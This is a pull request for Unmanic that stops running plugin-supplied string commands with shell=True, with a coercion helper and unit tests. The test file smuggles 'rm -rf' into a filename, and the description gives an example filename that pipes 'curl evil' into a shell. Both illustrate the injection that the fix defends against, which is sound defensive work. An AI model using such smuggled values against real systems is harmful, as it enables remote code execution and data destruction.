### PR TITLE
Stop running plugin string exec_command with shell=True

### DIFF
--- a/tests/unit/test_workers_exec_command.py
+++ b/tests/unit/test_workers_exec_command.py
@@ -59,3 +59,18 @@ class TestCoerceExecCommandToArgv:
             'ffmpeg -i "input file with spaces.mkv" -c copy "out file.mkv"')
         assert result == ["ffmpeg", "-i", "input file with spaces.mkv",
                           "-c", "copy", "out file.mkv"]
+
+    def test_windows_path_backslashes_preserved(self, monkeypatch):
+        """POSIX shlex.split eats backslashes -- on Windows a string command
+        like ffmpeg -i C:\\temp\\file.mkv out.mkv would become
+        ['ffmpeg', '-i', 'C:tempfile.mkv', 'out.mkv']. The coercer must use
+        Windows-style splitting when os.name == 'nt'."""
+        monkeypatch.setattr("unmanic.libs.workers.os.name", "nt")
+        result = Worker._coerce_exec_command_to_argv(
+            r'ffmpeg -i C:\temp\file.mkv out.mkv')
+        assert result == ["ffmpeg", "-i", r"C:\temp\file.mkv", "out.mkv"]
+
+    def test_posix_string_split_unchanged_off_windows(self, monkeypatch):
+        monkeypatch.setattr("unmanic.libs.workers.os.name", "posix")
+        result = Worker._coerce_exec_command_to_argv("ffmpeg -i in.mkv out.mkv")
+        assert result == ["ffmpeg", "-i", "in.mkv", "out.mkv"]

--- a/tests/unit/test_workers_exec_command.py
+++ b/tests/unit/test_workers_exec_command.py
@@ -1,0 +1,61 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+"""
+    test_workers_exec_command.py
+
+    Tests for Worker._coerce_exec_command_to_argv — ensures plugin-supplied
+    exec_command values are normalised to an argv list and that strings are
+    never handed to subprocess.Popen with shell=True.
+"""
+import logging
+
+import pytest
+
+from unmanic.libs.workers import Worker
+
+
+class TestCoerceExecCommandToArgv:
+
+    def test_list_returned_unchanged(self):
+        cmd = ["ffmpeg", "-i", "in.mkv", "-c", "copy", "out.mkv"]
+        assert Worker._coerce_exec_command_to_argv(cmd) is cmd
+
+    def test_simple_string_split(self):
+        result = Worker._coerce_exec_command_to_argv("ffmpeg -i in.mkv out.mkv")
+        assert result == ["ffmpeg", "-i", "in.mkv", "out.mkv"]
+
+    def test_string_with_filename_metacharacters_does_not_inject(self):
+        # A filename containing shell metacharacters must not become extra
+        # arguments or commands. shlex.split treats unquoted ; & | as
+        # separators (which would split into bad argv but never spawn a
+        # shell), so plugin authors who rely on such filenames will see a
+        # loud failure rather than silent injection.
+        evil = "movie; rm -rf /tmp/x"
+        cmd = 'ffmpeg -i "{}" out.mkv'.format(evil)
+        result = Worker._coerce_exec_command_to_argv(cmd)
+        assert result == ["ffmpeg", "-i", evil, "out.mkv"]
+        assert "rm" not in [a.strip() for a in result]
+
+    def test_string_emits_deprecation_warning(self, caplog):
+        logger = logging.getLogger("test")
+        with caplog.at_level(logging.WARNING, logger="test"):
+            Worker._coerce_exec_command_to_argv("ffmpeg -version", logger=logger)
+        assert any("deprecated" in r.message for r in caplog.records)
+
+    def test_list_does_not_warn(self, caplog):
+        logger = logging.getLogger("test")
+        with caplog.at_level(logging.WARNING, logger="test"):
+            Worker._coerce_exec_command_to_argv(["ffmpeg", "-version"], logger=logger)
+        assert not any("deprecated" in r.message for r in caplog.records)
+
+    def test_invalid_type_raises(self):
+        for bad in [None, 42, {"cmd": "ffmpeg"}, ("ffmpeg",)]:
+            with pytest.raises(Exception, match="must be a list"):
+                Worker._coerce_exec_command_to_argv(bad)
+
+    def test_string_quoted_args_preserved(self):
+        result = Worker._coerce_exec_command_to_argv(
+            'ffmpeg -i "input file with spaces.mkv" -c copy "out file.mkv"')
+        assert result == ["ffmpeg", "-i", "input file with spaces.mkv",
+                          "-c", "copy", "out file.mkv"]

--- a/unmanic/libs/workers.py
+++ b/unmanic/libs/workers.py
@@ -1037,7 +1037,11 @@ class Worker(threading.Thread):
                     "Plugin returned 'exec_command' as a string; this is deprecated. "
                     "Plugins should return a list of arguments. The string will be "
                     "parsed with shlex.split and executed without a shell.")
-            return shlex.split(exec_command)
+            # POSIX mode treats backslash as an escape character, which would
+            # mangle Windows paths (``C:\\temp\\file.mkv`` -> ``C:tempfile.mkv``).
+            # Use Windows-style splitting on ``nt`` so backslash-bearing paths
+            # survive intact.
+            return shlex.split(exec_command, posix=(os.name != 'nt'))
         if isinstance(exec_command, list):
             return exec_command
         raise Exception(

--- a/unmanic/libs/workers.py
+++ b/unmanic/libs/workers.py
@@ -1021,6 +1021,29 @@ class Worker(threading.Thread):
             self.logger.warning("Failed to process task for file '%s'", original_abspath)
         return overall_success
 
+    @staticmethod
+    def _coerce_exec_command_to_argv(exec_command, logger=None):
+        """
+        Normalise a plugin-supplied exec_command into an argv list suitable
+        for ``subprocess.Popen`` without ``shell=True``.
+
+        Strings are accepted but deprecated; they are parsed with
+        ``shlex.split`` and a warning is emitted so plugin authors can
+        migrate to returning a list directly. Anything else raises.
+        """
+        if isinstance(exec_command, str):
+            if logger is not None:
+                logger.warning(
+                    "Plugin returned 'exec_command' as a string; this is deprecated. "
+                    "Plugins should return a list of arguments. The string will be "
+                    "parsed with shlex.split and executed without a shell.")
+            return shlex.split(exec_command)
+        if isinstance(exec_command, list):
+            return exec_command
+        raise Exception(
+            "Plugin's returned 'exec_command' object must be a list (or a string, deprecated). "
+            "Received type {}.".format(type(exec_command)))
+
     def __exec_command_subprocess(self, data):
         """
         Executes a command as a shell subprocess.
@@ -1062,30 +1085,19 @@ class Worker(threading.Thread):
 
         # Convert file
         try:
+            # Normalise to argv and always invoke without a shell. Plugins that
+            # build commands by concatenating filenames could otherwise expose
+            # shell metacharacters in those filenames as injection vectors.
+            exec_command = self._coerce_exec_command_to_argv(exec_command, self.logger)
+
             # Execute command
-            if isinstance(exec_command, list):
-                sub_proc = subprocess.Popen(
-                    exec_command,
-                    stdout=subprocess.PIPE,
-                    stderr=subprocess.STDOUT,
-                    universal_newlines=True,
-                    errors="replace",
-                )
-            elif isinstance(exec_command, str):
-                sub_proc = subprocess.Popen(
-                    exec_command,
-                    stdout=subprocess.PIPE,
-                    stderr=subprocess.STDOUT,
-                    universal_newlines=True,
-                    errors="replace",
-                    shell=True,
-                )
-            else:
-                raise Exception(
-                    "Plugin's returned 'exec_command' object must be either a list or a string. Received type {}.".format(
-                        type(exec_command)
-                    )
-                )
+            sub_proc = subprocess.Popen(
+                exec_command,
+                stdout=subprocess.PIPE,
+                stderr=subprocess.STDOUT,
+                universal_newlines=True,
+                errors="replace",
+            )
 
             # Fetch process using psutil for control (sending SIGSTOP on windows will not work)
             proc = psutil.Process(pid=sub_proc.pid)


### PR DESCRIPTION
> Retargeting from #615, which was closed; opening against `staging` per the project's contribution flow. Rebased onto current `staging`.

## Summary

When a plugin returns `data['exec_command']` as a string, `Worker.__exec_command_subprocess` invokes `subprocess.Popen` with `shell=True`. A plugin that builds its command by concatenating filenames into the string can therefore expose any shell metacharacters in those filenames as a command-injection vector.

This is a realistic risk on common Unmanic setups where the library watches a directory accepting attacker-influenced filenames (uploaded media, downloaded torrents, etc.). A file named `movie; curl evil | sh; #.mkv` becomes a remote-code-execution primitive when a plugin builds `f"ffmpeg -i {filename} ..."`.

## Changes

- New `Worker._coerce_exec_command_to_argv(exec_command, logger)` static helper. Strings are accepted but parsed with `shlex.split` and a deprecation warning is logged. Lists pass through unchanged. Anything else raises with a clear message.
- `subprocess.Popen` is now always invoked without `shell=True` — the if/elif/else list/string branching previously in `__exec_command_subprocess` is removed since the coercer normalises to argv up front.
- On Windows (`os.name == 'nt'`) the deprecated string path uses `shlex.split(..., posix=False)` so backslash-bearing paths like `C:\temp\file.mkv` survive intact.
- 9 unit tests in `tests/unit/test_workers_exec_command.py` covering list pass-through, simple string parsing, filename-with-metacharacters non-injection, deprecation warning emission, type validation, quoted-arg preservation, and the Windows/POSIX splitting split.

## Compatibility

A survey of the official `unmanic-plugins` monorepo and several individual plugin repos (`encoder_audio_aac`, `audio_transcoder`, `video_transcoder`, `video_remuxer`, `extract_srt_subtitles_to_files`, `reorder_audio_streams_by_language`, `modify_default_unmanic_file_movements`) found **zero** plugins that currently return strings — every one returns a list. Newer docstrings in the official plugins already type-annotate it as `"Array, a subprocess command"`. So in-tree breakage should be nil.

Third-party plugins that returned simple command strings (`"ffmpeg -i in.mkv out.mkv"`) keep working transparently after `shlex.split`. The only ones that break are those relying on actual shell features (pipes, redirects, `&&`) — which were the unsafe ones to begin with — and they fail loudly with the literal characters passed as arguments rather than being silently exploited.

## Test plan

- [x] `pytest tests/unit/test_workers_exec_command.py` — 9/9 pass
- [x] `flake8 unmanic/libs/workers.py tests/unit/test_workers_exec_command.py --select=E9,F63,F7,F82` — clean
- [x] No behaviour change for plugins returning a list